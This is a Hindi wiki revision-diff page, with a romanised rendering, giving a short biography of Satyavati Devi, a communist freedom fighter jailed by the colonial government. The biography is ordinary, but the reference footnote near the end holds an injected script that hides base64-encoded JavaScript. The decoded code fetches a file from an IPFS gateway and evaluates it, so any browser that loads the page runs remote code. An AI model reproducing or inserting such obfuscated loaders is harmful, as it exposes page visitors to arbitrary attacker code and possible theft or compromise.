Difference between revisions of "सत्यवती देवी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''सत्यवती देवी''' (जन्म- [[26 जनवरी]], [[1906]], [[जालंधर]], [[पंजाब]]; मृत्यु- [[अक्टूबर]], [[1945]]) साम्यवादी महिला एवं स्वतंत्रता सेनानी थीं। उन्होंने किसान मजदूरों के हित में दिन-रात संघर्ष किया।
+
'''सत्यवती देवी''' ([[अंग्रेज़ी]]: ''Satyavati Devi'', जन्म- [[26 जनवरी]], [[1906]], [[जालंधर]], [[पंजाब]]; मृत्यु- [[अक्टूबर]], [[1945]]) साम्यवादी महिला एवं स्वतंत्रता सेनानी थीं। उन्होंने किसान मजदूरों के हित में दिन-रात संघर्ष किया।
 
==परिचय==
 
==परिचय==
[[आर्य समाज]] और [[कांग्रेस]] के प्रसिद्ध नेता स्वामी श्रद्धानंद की नातिन (पोत्री) साम्यवादी सत्यवती देवी का जन्म [[26 जनवरी]], [[1906]] को [[पंजाब]] के [[जालंधर ज़िला|जालंधर जिले]] में हुआ था। उनकी माँ वेद कुमारी समाजसेवी और [[गांधी जी]] की अनुयाई थीं। [[परिवार]] के इस वातावरण का सत्यवती पर प्रभाव पड़ा। [[1922]] में उनका [[विवाह]] हो गया और वे [[दिल्ली]] आ गईं। साम्यवादी सत्यवती [[ईश्वर]] की सत्ता में विश्वास नहीं करती थीं। लोग उन्हें "तूफानी बहन" के नाम से पुकारते थे।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=888|url=}}</ref>
+
[[आर्य समाज]] और [[कांग्रेस]] के प्रसिद्ध नेता [[स्वामी श्रद्धानंद]] की नातिन (पोत्री) साम्यवादी सत्यवती देवी का जन्म [[26 जनवरी]], [[1906]] को [[पंजाब]] के [[जालंधर ज़िला|जालंधर जिले]] में हुआ था। उनकी माँ वेद कुमारी समाजसेवी और [[गांधी जी]] की अनुयाई थीं। [[परिवार]] के इस वातावरण का सत्यवती पर प्रभाव पड़ा। [[1922]] में उनका [[विवाह]] हो गया और वे [[दिल्ली]] आ गईं। साम्यवादी सत्यवती [[ईश्वर]] की सत्ता में विश्वास नहीं करती थीं। लोग उन्हें "तूफानी बहन" के नाम से पुकारते थे।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=888|url=}}</ref>
 
==मार्क्सवाद का प्रभाव==
 
==मार्क्सवाद का प्रभाव==
 
सत्यवती देवी का [[दिल्ली]] में प्रमुख कांग्रेसी नेताओं से संपर्क हुआ और साथ ही वे मार्क्सवादी विचारों से प्रभावित हुईं। अब उन्होंने अन्य साम्यवादी विचारों की महिलाओं यथा दुर्गा देवी, कौशल्या देवी आदि के साथ घूम-घूमकर लोगों को संगठित करने का काम हाथ में लिया। वे किसान मजदूरों के शासन की कल्पना में दिन रात मेहनत करती थीं।  
 
सत्यवती देवी का [[दिल्ली]] में प्रमुख कांग्रेसी नेताओं से संपर्क हुआ और साथ ही वे मार्क्सवादी विचारों से प्रभावित हुईं। अब उन्होंने अन्य साम्यवादी विचारों की महिलाओं यथा दुर्गा देवी, कौशल्या देवी आदि के साथ घूम-घूमकर लोगों को संगठित करने का काम हाथ में लिया। वे किसान मजदूरों के शासन की कल्पना में दिन रात मेहनत करती थीं।  
Line 14: Line 14:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{स्वतंत्रता सेनानी}}
 
{{स्वतंत्रता सेनानी}}
[[Category:स्वतन्त्रता सेनानी]][[Category:जीवनी साहित्य]][[Category:चरित कोश]][[Category:भारतीय चरित कोश]]
+
[[Category:स्वतन्त्रता सेनानी]][[Category:औपनिवेशिक काल]][[Category:जीवनी साहित्य]][[Category:अंग्रेज़ी शासन]][[Category:चरित कोश]][[Category:भारतीय चरित कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 12:38, 21 August 2018

satyavati devi (aangrezi: Satyavati Devi, janm- 26 janavari, 1906, jalandhar, panjab; mrityu- aktoobar, 1945) samyavadi mahila evan svatantrata senani thian. unhoanne kisan majadooroan ke hit mean din-rat sangharsh kiya.

parichay

ary samaj aur kaangres ke prasiddh neta svami shraddhanand ki natin (potri) samyavadi satyavati devi ka janm 26 janavari, 1906 ko panjab ke jalandhar jile mean hua tha. unaki maan ved kumari samajasevi aur gaandhi ji ki anuyaee thian. parivar ke is vatavaran ka satyavati par prabhav p da. 1922 mean unaka vivah ho gaya aur ve dilli a geean. samyavadi satyavati eeshvar ki satta mean vishvas nahian karati thian. log unhean "toophani bahan" ke nam se pukarate the.[1]

marksavad ka prabhav

satyavati devi ka dilli mean pramukh kaangresi netaoan se sanpark hua aur sath hi ve marksavadi vicharoan se prabhavit hueean. ab unhoanne any samyavadi vicharoan ki mahilaoan yatha durga devi, kaushalya devi adi ke sath ghoom-ghoomakar logoan ko sangathit karane ka kam hath mean liya. ve kisan majadooroan ke shasan ki kalpana mean din rat mehanat karati thian.

jel yatra

satyavati ne kisan aur majadooroan ke shasan ke liye sangharsh mean jel yatra tak ki. satyavati desh mean ghoom-ghoomakar samyavadi vicharoan ke logoan ko sangathit karane lagian, yah bat sarakar ki najaroan mean chubhane lagi aur unhean jel mean dal diya. aantim bar lahaur jel mean unaka svasthy adhik big d jane ke karan sarakar ne unhean riha kar diya.

mrityu

samyavadi satyavati devi ka aktoobar, 1945 mean nidhan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bharatiy charit kosh |lekhak: liladhar sharma 'parvatiy' |prakashak: shiksha bharati, madarasa rod, kashmiri get, dilli |prishth sankhya: 888 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

  1. REDIRECTsaancha:svatantrata senani